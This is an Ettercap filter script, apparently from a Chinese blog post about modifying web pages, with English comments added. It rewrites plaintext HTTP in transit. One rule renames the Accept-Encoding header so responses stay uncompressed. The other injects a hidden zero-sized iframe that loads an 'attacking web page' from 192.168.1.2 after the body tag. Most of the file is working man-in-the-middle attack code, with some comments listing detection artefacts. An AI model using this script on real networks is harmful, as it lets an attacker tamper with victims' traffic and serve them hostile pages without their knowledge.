# Ettercap filter source that rewrites plaintext HTTP passing through the
# ettercap host. It has two independent rules: one edits outgoing requests,
# the other edits incoming responses. Both rules skip packets whose IP
# destination is 192.168.1.2, the same address the injected iframe points at.
#
# Defender's view: these rules match only TCP ports 80/8080 and literal
# plaintext strings in the payload, so they have nothing to match in
# TLS-protected traffic. Observable artefacts of this filter are the literal
# request header name "Accept-Nothing!" and a zero-sized iframe that loads
# http://192.168.1.2/hiroot.html directly after the opening body tag.
#
# NOTE(review): both conditions chain && and || without grouping. Whether the
# "|| ... == 8080" alternative is still subject to the protocol and
# destination tests depends on how etterfilter evaluates the chain; confirm
# against etterfilter(8) before relying on either reading.

#--Strip Accept-Encoding--
# Rule 1: TCP packets addressed to port 80 or 8080 (client requests).
if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.dst == 80 || tcp.dst == 8080) {
   # Only touch packets whose payload contains an Accept-Encoding header.
   if (search(DATA.data, "Accept-Encoding")) {
      # Rename the header so the server no longer sees Accept-Encoding. The
      # replacement string has the same length as the original (15 bytes).
      # Per the original author, the aim is a plain-text response that rule 2
      # can search.
      replace("Accept-Encoding", "Accept-Nothing!");
   }
}

#--Inject Iframe--
# Rule 2: TCP packets coming from port 80 or 8080 (server responses).
if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.src == 80 || tcp.src == 8080) {
   # Lower-case spelling of the tag: re-emit it followed by a width=0 height=0
   # iframe whose source is hiroot.html on 192.168.1.2 (called the attacking
   # web page by the original author), then log the event for the operator.
   if (search(DATA.data, "<body>")){
      replace("<body>","<body><iframe src='http://192.168.1.2/hiroot.html' width=0 height=0 />");
      msg("iframe injected after <body>\n");
   }
   # Same rewrite for the upper-case spelling of the tag.
   if (search(DATA.data, "<BODY>")){
      replace("<BODY>","<BODY><IFRAME SRC='http://192.168.1.2/hiroot.html' width=0 height=0 />");
      msg("iframe injected after <BODY>\n");
   }
}
ettercap 修改页面内容
原创
©著作权归作者所有:来自51CTO博客作者y0umer1的原创作品,请联系作者获取转载授权,否则将追究法律责任